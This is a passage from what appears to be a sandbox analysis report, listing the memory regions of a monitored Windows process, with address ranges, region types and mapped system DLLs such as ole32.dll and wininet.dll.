(normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1023 start_va = 0x670000 end_va = 0x7f7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 1024 start_va = 0x820000 end_va = 0x82ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000820000" filename = "" Region: id = 1025 start_va = 0x764f0000 end_va = 0x7651afff monitored = 0 entry_point = 0x764f5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1026 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1027 start_va = 0x140000 end_va = 0x140fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 1028 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1029 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 1030 start_va = 0x830000 end_va = 0x9b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000830000" filename = "" Region: id = 1031 start_va = 0x9c0000 end_va = 0xdbafff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009c0000" filename = "" Region: id = 1032 start_va = 0x52d0000 end_va = 0x66cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000052d0000" filename = "" Region: id = 1033 start_va = 0xdc0000 end_va = 0xea9fff monitored = 0 entry_point = 0xdfd650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 1034 start_va = 0xdc0000 end_va = 0xf41fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000dc0000" filename = "" Region: id = 1035 start_va = 0xf50000 end_va = 0x10d9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f50000" filename = "" Region: id = 1037 start_va = 0x66d0000 end_va = 0x69c9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000066d0000" filename = "" Region: id = 1038 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 1039 start_va = 0xdc0000 end_va = 0xebffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000dc0000" filename = "" Region: id = 1040 start_va = 0x540000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 1141 start_va = 0x540000 end_va = 0x56efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1142 start_va = 0xec0000 end_va = 0xeeefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ec0000" filename = "" Region: id = 1143 start_va = 0xef0000 end_va = 0xf82fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ef0000" filename = "" Region: id = 1144 start_va = 0xf90000 end_va = 0x1022fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f90000" filename = "" Region: id = 1145 start_va = 0x800000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 1146 start_va = 0x800000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 1147 start_va = 0x69d0000 end_va = 0x7393fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000069d0000" filename = "" Region: id = 1148 start_va = 0x1030000 end_va = 0x1224fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001030000" filename = "" Region: id = 1149 start_va = 0x73a0000 end_va = 0x7594fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000073a0000" filename = "" Region: id = 1151 start_va = 0x1230000 end_va = 0x126ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001230000" filename = "" Region: id = 1152 start_va = 0x1270000 end_va = 0x12affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001270000" filename = "" Region: id = 1153 start_va = 0x75a0000 end_va = 0x75c8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000075a0000" filename = "" Region: id = 1154 start_va = 0x703a0000 end_va = 0x705acfff monitored = 0 entry_point = 0x7048acb0 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 1157 start_va = 0x75d0000 end_va = 0x7742fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000075d0000" filename = "" Region: id = 1471 start_va = 0x75d0000 end_va = 0x771dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000075d0000" filename = "" Region: id = 1536 start_va = 0x75d0000 end_va = 0x76e8fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000075d0000" filename = "" Region: id = 1762 start_va = 0x75d0000 end_va = 0x76cdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000075d0000" filename = "" Region: id = 1813 start_va = 0x75d0000 end_va = 0x76d9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000075d0000" filename = "" Region: id = 1864 start_va = 0x75d0000 end_va = 0x7723fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000075d0000" filename = "" Region: id = 1915 start_va = 0x75d0000 end_va = 0x76b5fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000075d0000" filename = "" Region: id = 1967 start_va = 0x75d0000 end_va = 0x775cfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000075d0000" filename = "" Region: id = 2019 start_va = 0x75d0000 end_va = 0x76c7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000075d0000" filename = "" Region: id = 2070 start_va = 0x75d0000 end_va = 0x7715fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000075d0000" filename = "" Region: id = 2121 start_va = 0x75d0000 end_va = 0x7700fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000075d0000" filename = "" Region: id = 2173 start_va = 0x75d0000 end_va = 0x769cfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000075d0000" filename = "" Region: id = 2224 start_va = 0x75d0000 end_va = 0x7702fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000075d0000" filename = "" Region: id = 2275 start_va = 0x75d0000 end_va = 0x7763fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000075d0000" filename = "" Region: id = 2327 start_va = 0x75d0000 end_va = 0x76d2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000075d0000" filename = "" Region: id = 2378 start_va = 0x75d0000 end_va = 0x76c8fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000075d0000" filename = "" Region: id = 2430 start_va = 0x75d0000 end_va = 0x7730fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000075d0000" filename = "" Region: id = 2481 start_va = 0x75d0000 end_va = 0x769cfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000075d0000" filename = "" Region: id = 2533 start_va = 0x75d0000 end_va = 0x76befff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000075d0000" filename = "" Region: id = 2584 start_va = 0x75d0000 end_va = 0x76a1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000075d0000" filename = "" Region: id = 2635 start_va = 0x75d0000 end_va = 0x770cfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000075d0000" filename = "" Region: id = 2686 start_va = 0x75d0000 end_va = 0x7694fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000075d0000" filename = "" Region: id = 2737 start_va = 0x75d0000 end_va = 0x776dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000075d0000" filename = "" Region: id = 2789 start_va = 0x75d0000 end_va = 0x76defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000075d0000" filename = "" Region: id = 2840 start_va = 0x75d0000 end_va = 0x7714fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000075d0000" filename = "" Region: id = 2892 start_va = 0x75d0000 end_va = 0x76e1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000075d0000" filename = "" Region: id = 2943 start_va = 0x75d0000 end_va = 0x7691fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000075d0000" filename = "" Region: id = 2995 start_va = 0x75d0000 end_va = 0x7756fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000075d0000" filename = "" Region: id = 3046 start_va = 0x75d0000 end_va = 0x76d9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000075d0000" filename = "" Region: id = 3255 start_va = 0x75d0000 end_va = 0x760ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000075d0000" filename = "" Region: id = 3256 start_va = 0x7610000 end_va = 0x764ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007610000" filename = "" Region: id = 3257 start_va = 0x7650000 end_va = 0x77e3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007650000" filename = "" Region: id = 3259 start_va = 0x77f0000 end_va = 0x782ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000077f0000" filename = "" Region: id = 3260 start_va = 0x7830000 end_va = 0x786ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007830000" filename = "" Region: id = 3262 start_va = 0x800000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3263 start_va = 0x800000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3264 start_va = 0x800000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3265 start_va = 0x800000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3267 start_va = 0x800000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3268 start_va = 0x800000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3270 start_va = 0x800000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3271 start_va = 0x800000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3272 start_va = 0x800000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3273 start_va = 0x800000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3274 start_va = 0x800000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3275 start_va = 0x800000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3276 start_va = 0x800000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3277 start_va = 0x800000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3278 start_va = 0x800000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3279 start_va = 0x800000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3280 start_va = 0x800000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3281 start_va = 0x800000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3283 start_va = 0x800000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3284 start_va = 0x800000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3285 start_va = 0x800000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3286 start_va = 0x800000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3287 start_va = 0x800000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3288 start_va = 0x800000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3289 start_va = 0x800000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3290 start_va = 0x800000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3292 start_va = 0x800000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3293 start_va = 0x800000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3294 start_va = 0x800000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3295 start_va = 0x800000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3296 start_va = 0x800000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3297 start_va = 0x800000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3299 start_va = 0x800000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3300 start_va = 0x800000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3301 start_va = 0x800000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3302 start_va = 0x800000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3303 start_va = 0x800000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3304 start_va = 0x800000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3305 start_va = 0x800000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3306 start_va = 0x800000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3308 start_va = 0x800000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3309 start_va = 0x800000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3310 start_va = 0x800000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3311 start_va = 0x800000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3312 start_va = 0x800000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3313 start_va = 0x800000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3314 start_va = 0x800000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3315 start_va = 0x800000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3316 start_va = 0x800000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3317 start_va = 0x800000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3319 start_va = 0x800000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3320 start_va = 0x800000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3321 start_va = 0x800000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3322 start_va = 0x800000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3323 start_va = 0x800000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3324 start_va = 0x800000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3325 start_va = 0x800000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3326 start_va = 0x800000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3327 start_va = 0x800000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3328 start_va = 0x800000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3329 start_va = 0x800000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3330 start_va = 0x800000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3332 start_va = 0x800000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3333 start_va = 0x800000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3334 start_va = 0x800000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3335 start_va = 0x800000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3336 start_va = 0x800000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3337 start_va = 0x800000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3340 start_va = 0x800000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3341 start_va = 0x800000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3342 start_va = 0x800000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3343 start_va = 0x800000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3344 start_va = 0x800000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3345 start_va = 0x800000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3346 start_va = 0x800000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3347 start_va = 0x800000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3349 start_va = 0x800000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3350 start_va = 0x800000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3351 start_va = 0x800000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3352 start_va = 0x800000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3354 start_va = 0x800000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3355 start_va = 0x800000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3356 start_va = 0x800000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3357 start_va = 0x800000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3358 start_va = 0x800000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3359 start_va = 0x800000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3360 start_va = 0x800000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3361 start_va = 0x800000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3362 start_va = 0x800000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3363 start_va = 0x800000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3364 start_va = 0x800000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3365 start_va = 0x800000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3366 start_va = 0x800000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3367 start_va = 0x800000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3368 start_va = 0x800000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3369 start_va = 0x800000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3370 start_va = 0x800000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3371 start_va = 0x800000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3372 start_va = 0x800000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3373 start_va = 0x800000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3374 start_va = 0x800000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3375 start_va = 0x800000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3376 start_va = 0x800000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3377 start_va = 0x800000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3378 start_va = 0x800000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3379 start_va = 0x800000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3380 start_va = 0x800000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3381 start_va = 0x800000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3382 start_va = 0x800000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3383 start_va = 0x800000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3384 start_va = 0x800000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3385 start_va = 0x800000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3386 start_va = 0x800000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3387 start_va = 0x800000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3388 start_va = 0x800000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3389 start_va = 0x800000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3390 start_va = 0x800000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3391 start_va = 0x800000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3392 start_va = 0x800000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3393 start_va = 0x800000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3394 start_va = 0x800000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3395 start_va = 0x800000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3396 start_va = 0x800000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3397 start_va = 0x800000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3398 start_va = 0x800000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3399 start_va = 0x800000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3400 start_va = 0x800000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3401 start_va = 0x800000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3402 start_va = 0x800000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3403 start_va = 0x800000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3404 start_va = 0x800000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3405 start_va = 0x800000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3406 start_va = 0x800000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3407 start_va = 0x800000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3408 start_va = 0x800000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3409 start_va = 0x800000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3410 start_va = 0x800000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3411 start_va = 0x800000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 